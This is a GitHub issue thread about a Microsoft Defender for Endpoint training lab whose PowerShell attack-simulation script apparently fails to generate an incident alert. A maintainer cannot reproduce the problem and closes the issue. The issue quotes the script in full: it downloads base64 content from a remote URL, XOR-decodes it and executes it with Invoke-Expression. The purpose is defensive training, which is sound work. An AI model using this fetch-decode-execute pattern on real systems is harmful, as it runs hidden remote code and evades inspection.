Closed SkillableKA closed 1 month ago
KenMAG
commented
1 month ago Hi @SkillableKA I have no way to verify this as I cannot get a lab environment with an Azure pass. Also, using the script file was only a work around if you couldn't copy and run the script directly in PowerShell. The last time I tried this it worked fine.
KenMAG
commented
1 month ago Hi @SkillableKA, the script ran fine with no modification to the instructions and created alerts. And an incident,
KenMAG
commented
1 month ago I'm closing this (for now) as I cannot reproduce the problem.
Contact Details
kyle.asberry@skillable.com
What happened?
Exercise : 2 Task: 3 Step: 3
Description of issue: When running the provided PowerShell script, it will complete with no errors and launch the notepad as intended, but the injection does not run. It will never generate the incident alert as intended. Execution Policy, firewall settings, etc. have no effect on the results. Students are unable to proceed with Task 4 as the 'Multi-stage incident involving Defense evasion & Discovery on one endpoint' never populates.
;$xor = [System.Text.Encoding]::UTF8.GetBytes('WinATP-Intro-Injection'); $base64String = (Invoke-WebRequest -URI "https://wcdstaticfilesprdeus.blob.core.windows.net/wcdstaticfiles/MTP_Fileless_Recon.txt" -UseBasicParsing).Content;Try{ $contentBytes = [System.Convert]::FromBase64String($base64String) } Catch { $contentBytes = [System.Convert]::FromBase64String($base64String.Substring(3)) };$i = 0; $decryptedBytes = @();$contentBytes.foreach{ $decryptedBytes += $_ -bxor $xor[$i]; $i++; if ($i -eq $xor.Length) {$i = 0} };Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($decryptedBytes))
Repro steps:
Lab
Lab 02 Exercise 02 Mitigate Attacks with Microsoft Defender for Endpoint
Relevant screenshots
Do you want to help us? 👏